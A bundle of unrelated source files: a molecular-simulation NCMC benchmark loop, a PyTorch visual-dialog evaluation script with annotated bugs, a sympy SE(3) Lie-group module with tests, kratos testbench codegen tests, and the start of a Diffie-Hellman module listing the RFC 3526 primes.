        print('\nNow testing {0} null transformations'.format(molecule_name))
        for name, [scheme, functions] in methods.items():
            analyses = dict()
            #for ncmc_nsteps in [0, 1, 10, 100, 1000, 10000]:
            for ncmc_nsteps in [0, 1, 10, 100, 1000]:
                print('Running {0} {2} ExpandedEnsemble steps for {1} iterations'.format(ncmc_nsteps, niterations, name))
                testsystem = NullProposal(storage_filename='{0}_{1}-{2}steps.nc'.format(molecule_name, name, ncmc_nsteps), scheme=scheme, options={'functions' : functions, 'nsteps' : ncmc_nsteps})
                testsystem.exen_samplers[ENV].geometry_engine.use_sterics = use_sterics
                testsystem.mcmc_samplers[ENV].verbose = True
                testsystem.exen_samplers[ENV].verbose = True
                testsystem.mcmc_samplers[ENV].timestep = 1.0 * unit.femtoseconds
                # DEBUG
                #testsystem.exen_samplers[ENV].geometry_engine.write_proposal_pdb = True
                #testsystem.exen_samplers[ENV].geometry_engine.pdb_filename_prefix = '{0}_{1}-{2}steps'.format(molecule_name, name, ncmc_nsteps)
                # Equilibrate
                # WARNING: We can't equilibrate because it messes up the iteration counters and storage iterations for exen samplers
                #print('Equilibration...')
                #testsystem.mcmc_samplers[ENV].run(niterations=nequil)
                # Collect data on switching
                print('Production...')
                testsystem.exen_samplers[ENV].run(niterations=niterations)
                analysis = Analysis(testsystem.storage_filename)
                print(analysis.get_environments())
                # Per-protocol work traces are only meaningful with >= ~10 NCMC steps.
                if ncmc_nsteps > 9:
                    analysis.plot_ncmc_work('{0}_{1}-ncmc_work_over_{2}_steps.pdf'.format(molecule_name, name, ncmc_nsteps))
                analysis.plot_exen_logp_components()
                analyses[ncmc_nsteps] = analysis
            benchmark_exen_ncmc_protocol(analyses, molecule_name, name)
# Script entry point: run the full NCMC benchmark suite.
if __name__ == "__main__":
    benchmark_ncmc_work_during_protocol()
|
11521694
|
from __future__ import print_function
import argparse
import os
import random
import sys
sys.path.append(os.getcwd())
import pdb
import time
import numpy as np
import json
import progressbar
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from misc.utils import repackage_hidden, clip_gradient, adjust_learning_rate, \
decode_txt, sample_batch_neg, l2_norm
import misc.dataLoader as dl
import misc.model as model
from misc.encoder_QIH import _netE
import datetime
from misc.netG import _netG
# Command-line options: dataset locations plus the checkpoint to evaluate.
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='', help='folder to output images and model checkpoints')
parser.add_argument('--input_img_h5', default='vdl_img_vgg.h5', help='')
parser.add_argument('--input_ques_h5', default='visdial_data.h5', help='visdial_data.h5')
parser.add_argument('--input_json', default='visdial_params.json', help='visdial_params.json')
parser.add_argument('--model_path', default='', help='folder to output images and model checkpoints')
parser.add_argument('--cuda' , action='store_true', help='enables cuda')
opt = parser.parse_args()
print(opt)
# Fixed seed so evaluation is reproducible (python / torch / numpy, and CUDA below).
opt.manualSeed = 111 #random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
if opt.cuda:
    torch.cuda.manual_seed(opt.manualSeed)
    cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
    print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################################################################
# Data Loader
####################################################################################
# Loading a checkpoint replaces `opt` wholesale with the options saved at
# training time; the command-line paths are stashed first and restored after.
if opt.model_path != '':
    print("=> loading checkpoint '{}'".format(opt.model_path))
    checkpoint = torch.load(opt.model_path)
    model_path = opt.model_path
    data_dir = opt.data_dir
    input_img_h5 = opt.input_img_h5
    input_ques_h5 = opt.input_ques_h5
    input_json = opt.input_json
    opt = checkpoint['opt']
    opt.start_epoch = checkpoint['epoch']
    opt.batchSize = 5
    opt.data_dir = data_dir
    opt.model_path = model_path
input_img_h5 = os.path.join(opt.data_dir, opt.input_img_h5)
input_ques_h5 = os.path.join(opt.data_dir, opt.input_ques_h5)
input_json = os.path.join(opt.data_dir, opt.input_json)
# NOTE(review): opt.negative_sample / opt.num_val / opt.workers only exist on
# the checkpoint's saved opt — running without --model_path will fail here.
dataset_val = dl.validate(input_img_h5=input_img_h5, input_ques_h5=input_ques_h5,
                input_json=input_json, negative_sample = opt.negative_sample,
                num_val = opt.num_val, data_split = 'test')
dataloader_val = torch.utils.data.DataLoader(dataset_val, batch_size=30,
                                         shuffle=False, num_workers=int(opt.workers))
####################################################################################
# Build the Model
####################################################################################
vocab_size = dataset_val.vocab_size
ques_length = dataset_val.ques_length
ans_length = dataset_val.ans_length + 1  # +1 for the end-of-answer token
his_length = dataset_val.ans_length + dataset_val.ques_length
itow = dataset_val.itow  # index -> word mapping
img_feat_size = 512  # VGG conv feature dimensionality
print('init Generative model...')
netE_g = _netE(opt.model, opt.ninp, opt.nhid, opt.nlayers, opt.dropout, img_feat_size)
netW_g = model._netW(vocab_size, opt.ninp, opt.dropout)
netG = _netG(opt.model, vocab_size, opt.ninp, opt.nhid, opt.nlayers, opt.dropout)
sampler = model.gumbel_sampler()
critG = model.G_loss(opt.ninp)
critLM = model.LMCriterion()
# NOTE(review): `opt.model_path_G` and `checkpoint_G` are not defined anywhere
# in this script — loading generator weights here would raise NameError.
# Presumably copied from the training script; confirm against it.
if opt.model_path_G != '':
    print('Loading Generative model...')
    netW_g.load_state_dict(checkpoint_G['netW_g'])
    netE_g.load_state_dict(checkpoint_G['netE_g'])
    netG.load_state_dict(checkpoint_G['netG'])
if opt.cuda: # ship to cuda, if has GPU
    netW_g.cuda()
    netE_g.cuda()
    netG.cuda()
    critG.cuda()
    sampler.cuda()
    critLM.cuda()
def val():
    """Rank candidate answers for each dialog round with the generator (and a
    discriminator) and return the per-question ranks of the ground truth.

    Uses module-level tensors/Variables (img_input, ques_input, ...) defined
    below in this file.
    NOTE(review): several names used here are never defined in this script —
    netW_d, netE_d, netD, ques_hidden2, hist_hidden1, opt_hidden and rank_D —
    so this function raises NameError as-is; presumably the discriminator
    setup was dropped when this was copied from the training script. Confirm.
    """
    netE_g.eval()
    netW_g.eval()
    netG.eval()
    n_neg = 100
    ques_hidden1 = netE_g.init_hidden(opt.batchSize)
    hist_hidden2 = netE_g.init_hidden(opt.batchSize)
    data_iter_val = iter(dataloader_val)
    count = 0
    i = 0
    rank_G = []
    while i < len(dataloader_val):
        # NOTE(review): .next() is Python 2 iterator syntax; py3 needs next(...).
        data = data_iter_val.next()
        image, history, question, answer, answerT, questionL, opt_answer, \
        opt_answerT, answer_ids, answerLen, opt_answerLen, img_id = data
        batch_size = question.size(0)
        image = image.view(-1, 512)
        img_input.data.resize_(image.size()).copy_(image)
        # 10 dialog rounds per image.
        for rnd in range(10):
            # get the corresponding round QA and history.
            ques = question[:,rnd,:].t()
            his = history[:,:rnd+1,:].clone().view(-1, his_length).t()
            opt_ans = opt_answer[:,rnd,:,:].clone().view(-1, ans_length).t()
            opt_tans = opt_answerT[:,rnd,:].clone().view(-1, ans_length).t()
            gt_id = answer_ids[:,rnd]
            opt_len = opt_answerLen[:,rnd,:].clone().view(-1)
            ques_input.data.resize_(ques.size()).copy_(ques)
            his_input.data.resize_(his.size()).copy_(his)
            opt_ans_input.data.resize_(opt_ans.size()).copy_(opt_ans)
            opt_ans_target.data.resize_(opt_tans.size()).copy_(opt_tans)
            gt_index.data.resize_(gt_id.size()).copy_(gt_id)
            ques_emb_g = netW_g(ques_input, format = 'index')
            his_emb_g = netW_g(his_input, format = 'index')
            ques_emb_d = netW_d(ques_input, format = 'index')
            his_emb_d = netW_d(his_input, format = 'index')
            ques_hidden1 = repackage_hidden(ques_hidden1, batch_size)
            ques_hidden2 = repackage_hidden(ques_hidden2, batch_size)
            hist_hidden1 = repackage_hidden(hist_hidden1, his_emb_g.size(1))
            hist_hidden2 = repackage_hidden(hist_hidden2, his_emb_d.size(1))
            featG, ques_hidden1 = netE_g(ques_emb_g, his_emb_g, img_input, \
                                                ques_hidden1, hist_hidden1, rnd+1)
            featD, _ = netE_d(ques_emb_d, his_emb_d, img_input, \
                                                ques_hidden2, hist_hidden2, rnd+1)
            #featD = l2_norm(featD)
            # Feed the encoder feature once to prime the generator's hidden state.
            _, ques_hidden1 = netG(featG.view(1,-1,opt.ninp), ques_hidden1)
            # Replicate the hidden state 100x: one copy per candidate answer.
            hidden_replicated = []
            for hid in ques_hidden1:
                hidden_replicated.append(hid.view(opt.nlayers, batch_size, 1, \
                    opt.nhid).expand(opt.nlayers, batch_size, 100, opt.nhid).clone().view(opt.nlayers, -1, opt.nhid))
            hidden_replicated = tuple(hidden_replicated)
            ans_emb = netW_g(opt_ans_input, format = 'index')
            output, _ = netG(ans_emb, hidden_replicated)
            # Score each candidate by its (negative) generation log-likelihood.
            logprob = - output
            logprob_select = torch.gather(logprob, 1, opt_ans_target.view(-1,1))
            mask = opt_ans_target.data.eq(0)  # generate the mask
            if isinstance(logprob, Variable):
                mask = Variable(mask, volatile=logprob.volatile)
            # Zero out padding positions so they don't affect the score.
            logprob_select.masked_fill_(mask.view_as(logprob_select), 0)
            prob = logprob_select.view(ans_length, -1, 100).sum(0).view(-1,100)
            # Offset gt indices into the flattened (batch*100) candidate list.
            for b in range(batch_size):
                gt_index.data[b] = gt_index.data[b] + b*100
            gt_score = prob.view(-1).index_select(0, gt_index)
            sort_score, sort_idx = torch.sort(prob, 1)
            # Rank of the ground truth = 1 + number of candidates scoring better.
            count = sort_score.lt(gt_score.view(-1,1).expand_as(sort_score))
            rank = count.sum(1) + 1
            rank_G += list(rank.view(-1).data.cpu().numpy())
            # Discriminator ranking: dot product between encoder and answer features.
            opt_ans_emb = netW_d(opt_ans_target, format = 'index')
            opt_hidden = repackage_hidden(opt_hidden, opt_ans_target.size(1))
            opt_feat = netD(opt_ans_emb, opt_ans_target, opt_hidden, vocab_size)
            opt_feat = opt_feat.view(batch_size, -1, opt.ninp)
            #ans_emb = ans_emb.view(ans_length, -1, 100, opt.nhid)
            featD = featD.view(-1, opt.ninp, 1)
            score = torch.bmm(opt_feat, featD)
            score = score.view(-1, 100)
            gt_score = score.view(-1).index_select(0, gt_index)
            sort_score, sort_idx = torch.sort(score, 1, descending=True)
            count = sort_score.gt(gt_score.view(-1,1).expand_as(sort_score))
            rank = count.sum(1) + 1
            rank_D += list(rank.view(-1).data.cpu().numpy())
        i += 1
        # Periodic progress report of generator retrieval metrics.
        if i % 50 == 0:
            R1 = np.sum(np.array(rank_G)==1) / float(len(rank_G))
            R5 = np.sum(np.array(rank_G)<=5) / float(len(rank_G))
            R10 = np.sum(np.array(rank_G)<=10) / float(len(rank_G))
            ave = np.sum(np.array(rank_G)) / float(len(rank_G))
            mrr = np.sum(1/(np.array(rank_G, dtype='float'))) / float(len(rank_G))
            print ('%d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(1, len(dataloader_val), mrr, R1, R5, R10, ave))
    return rank_G, rank_D
####################################################################################
# Main
####################################################################################
# Preallocate input tensors; val() resizes them per batch via .data.resize_().
img_input = torch.FloatTensor(opt.batchSize)
ques_input = torch.LongTensor(ques_length, opt.batchSize)
his_input = torch.LongTensor(his_length, opt.batchSize)
# answer input
ans_input = torch.LongTensor(ans_length, opt.batchSize)
ans_target = torch.LongTensor(ans_length, opt.batchSize)
wrong_ans_input = torch.LongTensor(ans_length, opt.batchSize)
sample_ans_input = torch.LongTensor(1, opt.batchSize)
fake_len = torch.LongTensor(opt.batchSize)
fake_diff_mask = torch.ByteTensor(opt.batchSize)
fake_mask = torch.ByteTensor(opt.batchSize)
# answer len
batch_sample_idx = torch.LongTensor(opt.batchSize)
# noise
noise_input = torch.FloatTensor(opt.batchSize)
# for evaluation:
opt_ans_input = torch.LongTensor(opt.batchSize)
gt_index = torch.LongTensor(opt.batchSize)
opt_ans_target = torch.LongTensor(opt.batchSize)
if opt.cuda:
    ques_input, his_input, img_input = ques_input.cuda(), his_input.cuda(), img_input.cuda()
    ans_input, ans_target = ans_input.cuda(), ans_target.cuda()
    wrong_ans_input = wrong_ans_input.cuda()
    sample_ans_input = sample_ans_input.cuda()
    fake_len = fake_len.cuda()
    noise_input = noise_input.cuda()
    batch_sample_idx = batch_sample_idx.cuda()
    fake_diff_mask = fake_diff_mask.cuda()
    fake_mask = fake_mask.cuda()
    opt_ans_input = opt_ans_input.cuda()
    gt_index = gt_index.cuda()
    opt_ans_target = opt_ans_target.cuda()
# Wrap in (legacy) autograd Variables.
ques_input = Variable(ques_input)
img_input = Variable(img_input)
his_input = Variable(his_input)
ans_input = Variable(ans_input)
ans_target = Variable(ans_target)
wrong_ans_input = Variable(wrong_ans_input)
sample_ans_input = Variable(sample_ans_input)
noise_input = Variable(noise_input)
batch_sample_idx = Variable(batch_sample_idx)
fake_diff_mask = Variable(fake_diff_mask)
fake_mask = Variable(fake_mask)
opt_ans_input = Variable(opt_ans_input)
opt_ans_target = Variable(opt_ans_target)
gt_index = Variable(gt_index)
# NOTE(review): netW_d / netE_d / netD (and opt.D_lr etc.) are never defined in
# this script — these optimizers would raise NameError, and are unused during
# evaluation anyway; presumably leftovers from the training script. Confirm.
optimizerD = optim.Adam([{'params': netW_d.parameters()},
                        {'params': netE_d.parameters()},
                        {'params': netD.parameters()}], lr=opt.D_lr, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam([{'params': netW_g.parameters()},
                        {'params': netE_g.parameters()},
                        {'params': netG.parameters()}], lr=opt.G_lr, betas=(opt.beta1, 0.999))
optimizerLM = optim.Adam([{'params': netW_g.parameters()},
                        {'params': netE_g.parameters()},
                        {'params': netG.parameters()}], lr=opt.LM_lr, betas=(opt.beta1, 0.999))
history = []
train_his = {}
epoch = 0
print('Evaluating ... ')
rank_G, rank_D = val()
# Final retrieval metrics for the generator...
R1 = np.sum(np.array(rank_G)==1) / float(len(rank_G))
R5 = np.sum(np.array(rank_G)<=5) / float(len(rank_G))
R10 = np.sum(np.array(rank_G)<=10) / float(len(rank_G))
ave = np.sum(np.array(rank_G)) / float(len(rank_G))
mrr = np.sum(1/(np.array(rank_G, dtype='float'))) / float(len(rank_G))
print ('Generator: %d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(epoch, len(dataloader_val), mrr, R1, R5, R10, ave))
# ...and for the discriminator.
R1 = np.sum(np.array(rank_D)==1) / float(len(rank_D))
R5 = np.sum(np.array(rank_D)<=5) / float(len(rank_D))
R10 = np.sum(np.array(rank_D)<=10) / float(len(rank_D))
ave = np.sum(np.array(rank_D)) / float(len(rank_D))
mrr = np.sum(1/(np.array(rank_D, dtype='float'))) / float(len(rank_D))
print ('Discriminator: %d/%d: mrr: %f R1: %f R5 %f R10 %f Mean %f' %(epoch, len(dataloader_val), mrr, R1, R5, R10, ave))
|
11521726
|
import sympy
import sys
import unittest
import sophus
import functools
class Se3:
    """ 3 dimensional group of rigid body transformations """

    def __init__(self, so3, t):
        """ internally represented by a unit quaternion q (via So3) and a
            translation 3-vector """
        assert isinstance(so3, sophus.So3)
        assert isinstance(t, sympy.Matrix)
        assert t.shape == (3, 1), t.shape
        self.so3 = so3
        self.t = t

    @staticmethod
    def exp(v):
        """ exponential map: 6-vector [upsilon; omega] -> Se3.

        Rotation comes from So3.exp(omega); the translation is upsilon mapped
        through the left Jacobian V. NOTE: the closed form divides by theta,
        so it is singular at theta == 0 — callers take symbolic limits there.
        """
        upsilon = v[0:3, :]
        omega = sophus.Vector3(v[3], v[4], v[5])
        so3 = sophus.So3.exp(omega)
        Omega = sophus.So3.hat(omega)
        Omega_sq = Omega * Omega
        theta = sympy.sqrt(sophus.squared_norm(omega))
        V = (sympy.Matrix.eye(3) +
             (1 - sympy.cos(theta)) / (theta**2) * Omega +
             (theta - sympy.sin(theta)) / (theta**3) * Omega_sq)
        return Se3(so3, V * upsilon)

    def log(self):
        """ logarithmic map (inverse of exp): returns 6-vector [upsilon; omega].

        Also singular at theta == 0, like exp. """
        omega = self.so3.log()
        theta = sympy.sqrt(sophus.squared_norm(omega))
        Omega = sophus.So3.hat(omega)
        half_theta = 0.5 * theta
        V_inv = sympy.Matrix.eye(3) - 0.5 * Omega + (1 - theta * sympy.cos(
            half_theta) / (2 * sympy.sin(half_theta))) / (theta * theta) *\
            (Omega * Omega)
        upsilon = V_inv * self.t
        return upsilon.col_join(omega)

    def __repr__(self):
        # Fix: the original string was missing the closing "]".
        return "Se3: [" + repr(self.so3) + " " + repr(self.t) + "]"

    def inverse(self):
        """ returns the group inverse: (R, t)^-1 = (R^-1, -R^-1 t) """
        invR = self.so3.inverse()
        return Se3(invR, invR * (-1 * self.t))

    @staticmethod
    def hat(v):
        """ R^6 => R^4x4 """
        """ returns 4x4-matrix representation ``Omega`` """
        upsilon = sophus.Vector3(v[0], v[1], v[2])
        omega = sophus.Vector3(v[3], v[4], v[5])
        return sophus.So3.hat(omega).\
            row_join(upsilon).\
            col_join(sympy.Matrix.zeros(1, 4))

    @staticmethod
    def vee(Omega):
        """ R^4x4 => R^6 """
        """ returns 6-vector representation of Lie algebra """
        """ This is the inverse of the hat-operator """
        head = sophus.Vector3(Omega[0, 3], Omega[1, 3], Omega[2, 3])
        tail = sophus.So3.vee(Omega[0:3, 0:3])
        upsilon_omega = \
            sophus.Vector6(head[0], head[1], head[2], tail[0], tail[1], tail[2])
        return upsilon_omega

    def matrix(self):
        """ returns 4x4 homogeneous matrix representation [R t; 0 1] """
        R = self.so3.matrix()
        return (R.row_join(self.t)).col_join(sympy.Matrix(1, 4, [0, 0, 0, 1]))

    def __mul__(self, right):
        """ left-multiplication
            either rotation concatenation or point-transform """
        if isinstance(right, sympy.Matrix):
            assert right.shape == (3, 1), right.shape
            return self.so3 * right + self.t
        elif isinstance(right, Se3):
            r = self.so3 * right.so3
            t = self.t + self.so3 * right.t
            return Se3(r, t)
        assert False, "unsupported type: {0}".format(type(right))

    def __getitem__(self, key):
        """ We use the following convention [q0, q1, q2, q3, t0, t1, t2] """
        assert (key >= 0 and key < 7)
        if key < 4:
            return self.so3[key]
        else:
            return self.t[key - 4]

    @staticmethod
    def calc_Dx_exp_x(x):
        """ 7x6 Jacobian of exp(x) (quaternion+translation) w.r.t. x """
        return sympy.Matrix(7, 6, lambda r, c:
                            sympy.diff(Se3.exp(x)[r], x[c]))

    @staticmethod
    def Dx_exp_x_at_0():
        """ closed-form value of calc_Dx_exp_x at x = 0 """
        return sympy.Matrix([[0.0, 0.0, 0.0, 0.5, 0.0, 0.0],
                             [0.0, 0.0, 0.0, 0.0, 0.5, 0.0],
                             [0.0, 0.0, 0.0, 0.0, 0.0, 0.5],
                             [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                             [1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                             [0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
                             [0.0, 0.0, 1.0, 0.0, 0.0, 0.0]])

    def calc_Dx_this_mul_exp_x_at_0(self, x):
        """ Jacobian of (self * exp(x)) w.r.t. x, evaluated at x = 0.

        The last component is taken as a limit rather than substituted —
        presumably to resolve the 0/0 singularity of exp at theta == 0;
        TODO(review): confirm subs would not suffice here. """
        # (removed an unused `v = Se3.exp(x)` local from the original)
        return sympy.Matrix(7, 6, lambda r, c:
                            sympy.diff((self * Se3.exp(x))[r], x[c])). \
            subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
            subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)

    @staticmethod
    def calc_Dx_exp_x_at_0(x):
        """ calc_Dx_exp_x evaluated at x = 0 (limit in the last component) """
        return Se3.calc_Dx_exp_x(x).subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
            subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)

    @staticmethod
    def Dxi_x_matrix(x, i):
        """ derivative of matrix(x) w.r.t. the i-th internal parameter
            (quaternion components for i < 4, translation otherwise) """
        if i < 4:
            return sophus.So3.Dxi_x_matrix(x, i).\
                row_join(sympy.Matrix.zeros(3, 1)).\
                col_join(sympy.Matrix.zeros(1, 4))
        M = sympy.Matrix.zeros(4, 4)
        M[i - 4, 3] = 1
        return M

    @staticmethod
    def calc_Dxi_x_matrix(x, i):
        """ symbolic check for Dxi_x_matrix """
        return sympy.Matrix(4, 4, lambda r, c:
                            sympy.diff(x.matrix()[r, c], x[i]))

    @staticmethod
    def Dxi_exp_x_matrix(x, i):
        """ derivative of exp(x).matrix() w.r.t. x[i], via the chain rule """
        T = Se3.exp(x)
        Dx_exp_x = Se3.calc_Dx_exp_x(x)
        l = [Dx_exp_x[j, i] * Se3.Dxi_x_matrix(T, j) for j in range(0, 7)]
        return functools.reduce((lambda a, b: a + b), l)

    @staticmethod
    def calc_Dxi_exp_x_matrix(x, i):
        """ symbolic check for Dxi_exp_x_matrix """
        return sympy.Matrix(4, 4, lambda r, c:
                            sympy.diff(Se3.exp(x).matrix()[r, c], x[i]))

    @staticmethod
    def Dxi_exp_x_matrix_at_0(i):
        """ at x = 0 the derivative reduces to the i-th generator hat(e_i) """
        v = sophus.ZeroVector6()
        v[i] = 1
        return Se3.hat(v)

    @staticmethod
    def calc_Dxi_exp_x_matrix_at_0(x, i):
        """ symbolic check for Dxi_exp_x_matrix_at_0 """
        return sympy.Matrix(4, 4, lambda r, c:
                            sympy.diff(Se3.exp(x).matrix()[r, c], x[i])
                            ).subs(x[0], 0).subs(x[1], 0).subs(x[2], 0).\
            subs(x[3], 0).subs(x[4], 0).limit(x[5], 0)
class TestSe3(unittest.TestCase):
    """Symbolic self-tests: exp/log round trip, matrix action on points,
    analytic vs. computed derivatives, and C++ codegen gold comparison."""
    def setUp(self):
        # Symbols named so generated C++ code references the right identifiers.
        upsilon0, upsilon1, upsilon2, omega0, omega1, omega2 = sympy.symbols(
            'upsilon[0], upsilon[1], upsilon[2], omega[0], omega[1], omega[2]',
            real=True)
        x, v0, v1, v2 = sympy.symbols('q.w() q.x() q.y() q.z()', real=True)
        p0, p1, p2 = sympy.symbols('p0 p1 p2', real=True)
        t0, t1, t2 = sympy.symbols('t[0] t[1] t[2]', real=True)
        v = sophus.Vector3(v0, v1, v2)
        self.upsilon_omega = sophus.Vector6(
            upsilon0, upsilon1, upsilon2, omega0, omega1, omega2)
        self.t = sophus.Vector3(t0, t1, t2)
        self.a = Se3(sophus.So3(sophus.Quaternion(x, v)), self.t)
        self.p = sophus.Vector3(p0, p1, p2)
    def test_exp_log(self):
        # NOTE(review): only the first 3 components (upsilon) are compared;
        # presumably omega round-trip is covered by the So3 tests — confirm.
        for v in [sophus.Vector6(0., 1, 0.5, 2., 1, 0.5),
                  sophus.Vector6(0.1, 0.1, 0.1, 0., 1, 0.5),
                  sophus.Vector6(0.01, 0.2, 0.03, 0.01, 0.2, 0.03)]:
            w = Se3.exp(v).log()
            for i in range(0, 3):
                self.assertAlmostEqual(v[i], w[i])
    def test_matrix(self):
        # Group action on a point must agree with the homogeneous 4x4 matrix.
        T_foo_bar = Se3.exp(self.upsilon_omega)
        Tmat_foo_bar = T_foo_bar.matrix()
        point_bar = self.p
        p1_foo = T_foo_bar * point_bar
        p2_foo = sophus.proj(Tmat_foo_bar * sophus.unproj(point_bar))
        self.assertEqual(sympy.simplify(p1_foo - p2_foo),
                         sophus.ZeroVector3())
    def test_derivatives(self):
        # Closed-form Jacobians must match the symbolically-differentiated ones.
        self.assertEqual(sympy.simplify(
            Se3.calc_Dx_exp_x_at_0(self.upsilon_omega) -
            Se3.Dx_exp_x_at_0()),
            sympy.Matrix.zeros(7, 6))
        for i in range(0, 7):
            self.assertEqual(sympy.simplify(Se3.calc_Dxi_x_matrix(self.a, i) -
                                            Se3.Dxi_x_matrix(self.a, i)),
                             sympy.Matrix.zeros(4, 4))
        for i in range(0, 6):
            self.assertEqual(sympy.simplify(
                Se3.Dxi_exp_x_matrix(self.upsilon_omega, i) -
                Se3.calc_Dxi_exp_x_matrix(self.upsilon_omega, i)),
                sympy.Matrix.zeros(4, 4))
            self.assertEqual(sympy.simplify(
                Se3.Dxi_exp_x_matrix_at_0(i) -
                Se3.calc_Dxi_exp_x_matrix_at_0(self.upsilon_omega, i)),
                sympy.Matrix.zeros(4, 4))
    def test_codegen(self):
        # Compare generated C++ against checked-in gold files (or regenerate
        # by flipping the `if False:` guards).
        stream = sophus.cse_codegen(self.a.calc_Dx_exp_x(self.upsilon_omega))
        filename = "cpp_gencode/Se3_Dx_exp_x.cpp"
        # set to true to generate codegen files
        if False:
            file = open(filename, "w")
            for line in stream:
                file.write(line)
            file.close()
        else:
            file = open(filename, "r")
            file_lines = file.readlines()
            for i, line in enumerate(stream):
                self.assertEqual(line, file_lines[i])
            file.close()
        # NOTE(review): missing () — this attribute access does not close the stream.
        stream.close
        stream = sophus.cse_codegen(self.a.calc_Dx_this_mul_exp_x_at_0(
            self.upsilon_omega))
        filename = "cpp_gencode/Se3_Dx_this_mul_exp_x_at_0.cpp"
        # set to true to generate codegen files
        if False:
            file = open(filename, "w")
            for line in stream:
                file.write(line)
            file.close()
        else:
            file = open(filename, "r")
            file_lines = file.readlines()
            for i, line in enumerate(stream):
                self.assertEqual(line, file_lines[i])
            file.close()
        # NOTE(review): same missing () as above.
        stream.close
# Run the symbolic test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
11521750
|
from kratos import Generator, TestBench, initial, assert_, delay, Sequence
def tb_dut_setup():
    """Build a 1-bit pass-through DUT plus a testbench wired to it; return (dut, tb)."""
    dut = Generator("mod")
    # Port/variable creation order is kept identical to preserve generated RTL.
    out_port = dut.output("out", 1)
    in_port = dut.input("in", 1)
    dut.wire(out_port, in_port)
    # Internal mirror of the input, so tests can probe an internal signal.
    dut.wire(dut.var("val", 1), dut.ports["in"])

    tb = TestBench()
    tb.add_child("dut", dut)
    tb_in = tb.var("in", 1)
    tb_out = tb.var("out", 1)
    tb.wire(dut.ports["in"], tb_in)
    tb.wire(tb_out, dut.ports["out"])
    return dut, tb
def test_tb_codegen(check_gold):
    """Testbench codegen: an initial block drives `in` and asserts the outputs."""
    dut, tb = tb_dut_setup()
    @initial
    def code():
        tb.vars["in"] = 1
        assert_(tb.vars.out == 1)
        # access internal signal
        assert_(dut.vars.val == 1)
    tb.add_always(code)
    src = tb.codegen()
    # Compare the generated source against the checked-in gold file.
    check_gold(src, "test_tb_codegen")
def test_tb_delay(check_gold):
    """Testbench codegen: a delayed (#1) assignment inside an initial block."""
    dut, tb = tb_dut_setup()
    @initial
    def code():
        # Assign `in` = 1 after a delay of 1 time unit.
        delay(1, tb.vars["in"].assign(1))
    tb.add_always(code)
    src = tb.codegen()
    check_gold(src, "test_tb_delay")
def test_tb_sequence(check_gold):
    """Testbench codegen: a clocked assertion property built from a Sequence."""
    # Local imports keep these optional helpers out of module import time.
    from kratos.util import clock
    from kratos import PropertyAction
    dut, tb = tb_dut_setup()
    # add a clock and wire them together
    tb.wire(dut.clock("clk"), clock(tb.var("clk", 1)))
    # in == 1 |-> out == 1 ##1 out == 0
    seq = Sequence(tb.vars["in"] == 1)
    seq.imply(tb.vars.out == 1).wait(1).imply(tb.vars.out == 0)
    p = tb.property("test_out", seq)
    p.action = PropertyAction.Assert
    src = tb.codegen()
    check_gold(src, "test_tb_sequence")
if __name__ == "__main__":
    # Manual run: exercise the sequence test without invoking pytest.
    from conftest import check_gold_fn
    test_tb_sequence(check_gold_fn)
|
11521771
|
from binascii import hexlify
from hashlib import sha256
from os import urandom
# RFC 3526 - More Modular Exponential (MODP) Diffie-Hellman groups for
# Internet Key Exchange (IKE) https://tools.ietf.org/html/rfc3526
primes = {
# 1536-bit
5: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 2048-bit
14: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AACAA68FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 3072-bit
15: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
